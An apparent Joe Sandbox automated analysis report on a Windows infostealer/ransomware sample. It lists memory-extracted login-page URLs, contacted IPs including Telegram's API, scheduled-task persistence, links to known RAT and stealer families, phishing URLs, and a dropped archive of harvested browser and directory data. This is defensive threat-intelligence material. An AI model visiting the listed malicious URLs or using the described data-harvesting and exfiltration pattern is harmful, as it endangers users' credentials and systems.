https://webmail.claro.net.co/app/s/LoginPage.asp	p.html.0.dr	false	0%, Virustotal, Browse	unknown
https://www.incrementaltools.com/one-page-checkout.asp	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://www.pdffiller.com/en/login.htm	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://www.woodsmithshop.com/account/login/	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	tmp756C.tmp.dat.0.dr	false		high
https://www.panamericana.com.co/registro/inicio	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false	0%, Virustotal, Browse	unknown
https://www.iclaro.com.hn/app/s/LoginPage.asp	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false	0%, Virustotal, Browse	unknown
http://www.woodsmithlibrary.com/login/	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false	0%, Virustotal, Browse	unknown
https://portal.vectric.com/registerNew	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://resultados.lch.com.co/ingresar	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false	0%, Virustotal, Browse	unknown
https://support.mozilla.org	tmp756C.tmp.dat.0.dr	false		high
http://api.telegram.org	HTZ4az17lj.exe, 00000000.00000002.2116685622.00000295806A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	HTZ4az17lj.exe, 00000000.00000002.2138246850.000002959164E000.00000004.00000800.00020000.00000000.sdmp, tmp3D76.tmp.dat.0.dr, tmp756D.tmp.dat.0.dr	false		high
https://www.directv.com.co/midirectv/ingresar	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false	0%, Virustotal, Browse	unknown
https://www.spotify.com/co/signup/	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://www.amazon.com/ap/forgotpassword	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://www.instagram.com/accounts/signup/	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://www.amazon.com/ap/signin	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high
https://www.grammarly.com/signup	uuhbr0xg.h20.exe, 0000000B.00000002.2097336335.0000025680336000.00000004.00000800.00020000.00000000.sdmp, p.html.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
142.250.105.99	www.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
128.199.113.162	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1426719
Start date and time:	2024-04-16 14:26:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HTZ4az17lj.exe renamed because original name is a hash value
Original Sample Name:	ceb9e6829d00ad6e8f25b30d77aba83f.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@62/153@6/7
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.9.94, 172.253.124.102, 172.253.124.100, 172.253.124.113, 172.253.124.101, 172.253.124.138, 172.253.124.139, 74.125.138.84, 34.104.35.123, 199.232.210.172, 192.229.211.108, 172.217.215.94, 199.232.214.172, 64.233.176.139, 64.233.176.113, 64.233.176.138, 64.233.176.100, 64.233.176.101, 64.233.176.102
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target uuhbr0xg.h20.exe, PID 7832 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:26:57	API Interceptor	78x Sleep call for process: HTZ4az17lj.exe modified
14:26:58	Task Scheduler	Run new task: WinTask path: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe
14:27:04	API Interceptor	1x Sleep call for process: uuhbr0xg.h20.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.44.66	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse
	YVrNKlaWqu.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse
	hesaphareketi-01.pdf.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	WinDir.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer, zgRAT	Browse
	Hesap_Ekstresi_11956117.PDF.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	Dekont.pdf.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	z30PO1028930.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT	Browse
	vZFGXiTg6o.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT	Browse
	1.bat	Get hash	malicious	AsyncRAT, StormKitty, Strela Stealer, VenomRAT	Browse
	SecuriteInfo.com.Win32.RATX-gen.15036.22247.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty	Browse
149.154.167.220	NEW QUOTATION.exe	Get hash	malicious	AgentTesla	Browse
	Order 0230006 - Mexpol S.A.pdf.exe	Get hash	malicious	AgentTesla	Browse
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	iterms.pdf.exe	Get hash	malicious	DarkCloud	Browse
	rSHIPMENTSHIPPE.exe	Get hash	malicious	AgentTesla	Browse
	ORDER SPECIFICATION.exe	Get hash	malicious	AgentTesla	Browse
	17131664440dd00fd6922b1959138427bbaa2fdf5eadefe903194a46ed2d146bfcb79ec509916.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse
	bU8H.exe	Get hash	malicious	XWorm	Browse
	GxrG78Getq.exe	Get hash	malicious	AsyncRAT, Blackshades, Quasar, StormKitty, WorldWind Stealer	Browse
128.199.113.162	chrome.exe	Get hash	malicious	Metasploit	Browse	128.199.113.162/upwawsfrg.php
239.255.255.250	mal attachment.html	Get hash	malicious	HTMLPhisher	Browse
	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse
	http://sobeteracotafancris.ro	Get hash	malicious	Unknown	Browse
	https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPG	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://thermal48828442111.dorik.io/	Get hash	malicious	HTMLPhisher	Browse
	2024-04-16_11h42_39.png	Get hash	malicious	Unknown	Browse
	https://t9015570267.p.clickup-attachments.com/t9015570267/72d38610-17ec-4e02-be10-f5425c6ab8eb/Proof_Of_Payment.HTML?view=open	Get hash	malicious	HTMLPhisher	Browse
	https://www.canva.com/design/DAGCNH9x9o0/YBJ_HrFDfb50kAUzVAfmdg/view?utm_content=DAGCNH9x9o0&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse
104.16.185.241	GxrG78Getq.exe	Get hash	malicious	AsyncRAT, Blackshades, Quasar, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	PURCHASE_ORDER.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	Tax_docs_2023.pdf.lnk	Get hash	malicious	Metasploit	Browse	icanhazip.com/
	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	GxrG78Getq.exe	Get hash	malicious	AsyncRAT, Blackshades, Quasar, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	Lex-DKM988293.zip	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.44.66
	Tax_docs_2023.pdf.lnk	Get hash	malicious	Metasploit	Browse	172.67.196.114
	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	104.21.44.66
	YVrNKlaWqu.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	hesaphareketi-01.pdf.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	iUi6TG0GhX.exe	Get hash	malicious	AsyncRAT, Njrat, RevengeRAT, StormKitty, VenomRAT, Xmrig	Browse	172.67.196.114
	PAYMENT-COPYaosi.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	WinDir.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer, zgRAT	Browse	104.21.44.66
	RFQ195246.pdf.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
api.telegram.org	NEW QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Order 0230006 - Mexpol S.A.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	iterms.pdf.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	rSHIPMENTSHIPPE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ORDER SPECIFICATION.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	17131664440dd00fd6922b1959138427bbaa2fdf5eadefe903194a46ed2d146bfcb79ec509916.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	org.xls	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	bU8H.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
icanhazip.com	GxrG78Getq.exe	Get hash	malicious	AsyncRAT, Blackshades, Quasar, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	Lex-DKM988293.zip	Get hash	malicious	AsyncRAT, DcRat	Browse	104.16.184.241
	PURCHASE_ORDER.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	Tax_docs_2023.pdf.lnk	Get hash	malicious	Metasploit	Browse	104.16.185.241
	ZoominstallerFull.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	104.16.185.241
	sendslogstotg.exe	Get hash	malicious	Unknown	Browse	104.18.114.97
	sendslogstotg.exe	Get hash	malicious	Unknown	Browse	104.18.114.97
	1N9LML9w7L.exe	Get hash	malicious	Neshta, XWorm	Browse	104.18.115.97
	J7tu5vP0fA.exe	Get hash	malicious	Neshta, XWorm	Browse	104.18.114.97
	NECOv1fTXe.exe	Get hash	malicious	Neshta, XWorm	Browse	104.18.114.97

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	NEW QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Order 0230006 - Mexpol S.A.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	iterms.pdf.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	https://telegra.ph/Pvhomed-04-15	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	rSHIPMENTSHIPPE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	MenuEx.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	MenuEx.dll	Get hash	malicious	Unknown	Browse	149.154.167.99
	sharepoint.msi	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	sYlwfFFwFb.elf	Get hash	malicious	Mirai	Browse	8.47.122.20
	mal attachment.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	MT103.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse	104.17.2.184
	zLH4Gkr36e.elf	Get hash	malicious	Mirai	Browse	1.14.30.15
	JR58WqLhRl.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
	TANQUIVUIA.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.21.9.123
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	SecuriteInfo.com.Win32.TrojanX-gen.17997.17145.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
CLOUDFLARENETUS	sYlwfFFwFb.elf	Get hash	malicious	Mirai	Browse	8.47.122.20
	mal attachment.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	MT103.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse	104.17.2.184
	zLH4Gkr36e.elf	Get hash	malicious	Mirai	Browse	1.14.30.15
	JR58WqLhRl.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.4.15
	TANQUIVUIA.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.21.9.123
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	SecuriteInfo.com.Win32.TrojanX-gen.17997.17145.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
DIGITALOCEAN-ASNUS	z69ClienteNFe-Faturada-15042024.msi	Get hash	malicious	MicroClip	Browse	178.128.15.164
	zLH4Gkr36e.elf	Get hash	malicious	Mirai	Browse	167.174.154.169
	file.exe	Get hash	malicious	FormBook	Browse	64.225.91.73
	nY3jvpEUvw.elf	Get hash	malicious	Mirai	Browse	134.122.34.163
	u8D2EDf5M2.elf	Get hash	malicious	Mirai	Browse	134.122.107.63
	http://167.71.160.65/khldnusdMACscw00/index.html	Get hash	malicious	Unknown	Browse	167.71.160.65
	z37Nfe-Faturada-14042024.msi	Get hash	malicious	MicroClip	Browse	178.128.15.164
	file.exe	Get hash	malicious	FormBook	Browse	64.225.91.73
	ODOCVzwXq5.elf	Get hash	malicious	Mirai	Browse	134.209.166.158
	9XzxoGb2mX.elf	Get hash	malicious	Mirai	Browse	134.122.107.69

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse	23.1.237.91
	DHL Receipt_pdf.vbs	Get hash	malicious	AgentTesla	Browse	23.1.237.91
	SecuriteInfo.com.IL.Trojan.MSILZilla.30455.29056.1307.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	23.1.237.91
	Purchase#order10662324.pdf.exe	Get hash	malicious	AgentTesla	Browse	23.1.237.91
	4PPlLk8IT5.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	23.1.237.91
	https://window-security-app-swixg.ondigitalocean.app/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://dhl.b-loadt.eu/uDLNF	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://zimtendernotices.co.zw/login.html	Get hash	malicious	PayPal Phisher	Browse	23.1.237.91
	https://www.goodnewsliverpool.co.uk/?ads_click=1&data=10345-9192-0-3318-1&nonce=b019a2f042&redir=%68%74%74%70%25%33%41aiitpune.com%2Fjs%2Ftjux%2F%2Fc2J5cm5lQGpwYy5xbGQuZWR1LmF1&$	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://www.google.com/url?q=https://myworkspacea9fc6.myclickfunnels.com/onlinereview--cf58b?preview%3Dtrue&source=gmail&ust=1713278508068000&usg=AOvVaw2uqg230N5cpfHHh5kjayyW	Get hash	malicious	Unknown	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	mal attachment.html	Get hash	malicious	HTMLPhisher	Browse	23.63.206.91 40.127.169.103
	http://cubes.concordia.ca/track?type=click&enid=bWFpbGluZ2lkPTM2MjMmbWVzc2FnZWlkPTQxMjEmZGF0YWJhc2VpZD05MDEmc2VyaWFsPTEyNzU1MDM1NzUmZW1haWxpZD13YXJpZXN0NTkzMzgud2Vla2x5bWFpbEBibG9nZ2VyLmNvbSZ1c2VyaWQ9NDcxJmZsPSZleHRyYT1NdWx0aXZhcmlhdGVJZD0mJiY=&&&2028&&&http://gbmaucstans.com/?ddg5B=ZnJhbmNvaXMuYm91bGFuZ2VyQGNnaS5jb20=	Get hash	malicious	Unknown	Browse	23.63.206.91 40.127.169.103
	https://nts.embluemail.com/p/cl?data=Vt1BGZtgVLfostfhZom0hk8oVt5tiRlXt8RRT2mHtdghQTFUGtJ9hHhr3EU1SwPF1EvHGuTksiBjo87+ZeJps/CboX3Q8/0QJvV9bU2cNVg=!-!6j3,q9!-!https://secupo.webcindario.com/?conformite.idia@ca-idia.com	Get hash	malicious	HTMLPhisher	Browse	23.63.206.91 40.127.169.103
	https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPG	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.63.206.91 40.127.169.103
	2024-04-16_11h42_39.png	Get hash	malicious	Unknown	Browse	23.63.206.91 40.127.169.103
	https://t9015570267.p.clickup-attachments.com/t9015570267/72d38610-17ec-4e02-be10-f5425c6ab8eb/Proof_Of_Payment.HTML?view=open	Get hash	malicious	HTMLPhisher	Browse	23.63.206.91 40.127.169.103
	https://map.sewoon.org/1/themes/es/?cid=dcp@sanitasresidencial.com	Get hash	malicious	Unknown	Browse	23.63.206.91 40.127.169.103
	http://kunnskapsfilm.no	Get hash	malicious	Unknown	Browse	23.63.206.91 40.127.169.103
	ghVYKlWkRxFNuDb.exe	Get hash	malicious	AgentTesla	Browse	23.63.206.91 40.127.169.103
	https://danharborsuit.sbs/access/wfiles.html	Get hash	malicious	HTMLPhisher	Browse	23.63.206.91 40.127.169.103
3b5074b1b5d032e5620f69f9f700ff0e	NEW QUOTATION.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	MT103.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.44.66 149.154.167.220
	FRS133.js	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	FRS133.js	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	SecuriteInfo.com.Win32.TrojanX-gen.17997.17145.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	cybXkFC5nF.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	104.21.44.66 149.154.167.220
	Order 0230006 - Mexpol S.A.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	Oeyrmdo.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.44.66 149.154.167.220
	93001657328.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	cJYgnOgyhs.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220

Process:	C:\Users\user\Desktop\HTZ4az17lj.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	196894
Entropy (8bit):	7.927460767049972
Encrypted:	false
SSDEEP:	3072:vKjHj6BjVdjljTjwUjFtjzjCjBnZAFa4pEsjLfu4WkC1dNF2E3CRlyPP:vgDi/FfTP/oDAELsjL2OEy7yPP
MD5:	4A10617053A58FC3D40434AFE5EE1229
SHA1:	BFBF68BA8037C53FDE1F68DCB6DAFD6DE8B1EEF4
SHA-256:	65D6418DB239BCE7D2B37569EFFA4E1B8BAFB2FF4970CC963F88FB32600A0BC4
SHA-512:	5B426F09C7EA3A6FD50BA562ABBA574D024E41542F28BD53850B2BD638B71E34FD5069025629F84CB900C58C34D0A1E661EA262BE609F012151A916A65D1F0A1
Malicious:	false
Preview:	PK........o..X................Browsers\Edge\PK........o..X................Browsers\Google\PK........`s.XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........`s.Xc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.3''QA..L#.....J_...\/.".._........_....1M_S....PK........`s.X.......5.......Directories\Desktop.txte..n.0....W.T.R.&^0.0x..\.$..4AJ.Q......q.....Mv...Y??-p^0j..6.".,..].b..J&Y.M....2C..^6.6E.!.....9wE..2.5..N....fA.T.5..6.8.Se.L.......[Z.fe..'.&+b.#G.....D8.DN.6Jm..U.....g.....`.,qRp..4...(.F.~W..E..Yh......Rd._U..0............m'.=... Y..iP...R..\..v......p.E...u?%"$\.%1Q.d.....L..Xi...Q.y..Z.. ...h...#`..W....6..-!7.'z..N.t>...3..{..}y?...'.cpl.............m......PK........`s.X. {.............Directories\Documents.txtm..r.0....'..'.hA..!../..L1......'`6.s.E.......~......b.8.D')..rKD.D:F!b....hS4.t....`V..kHa.p...ffw...aY.....u..&B..Z..#.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 16 11:26:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9689112707388494
Encrypted:	false
SSDEEP:	48:8hdsTQUOHdlUidAKZdA19ehwiZUklqehEJy+3:84vp/y
MD5:	78FB0001027DE2BDA805BE1DB86DB239
SHA1:	0DC9640002D6DE94B03BD7787D2D2F2C3F00E40B
SHA-256:	219548EFB422EE56C63A14689098C3E8B5548ED4DF656CA779EEE33ADDA0D8C7
SHA-512:	11E59DF45747EEC2A3718876518DD397EDA05328A7362CA07A62428F1605809E9ABDD5B82160E217E8CE4404C86FE4B1FB95EC24B493C737136B7806006565A2
Malicious:	false
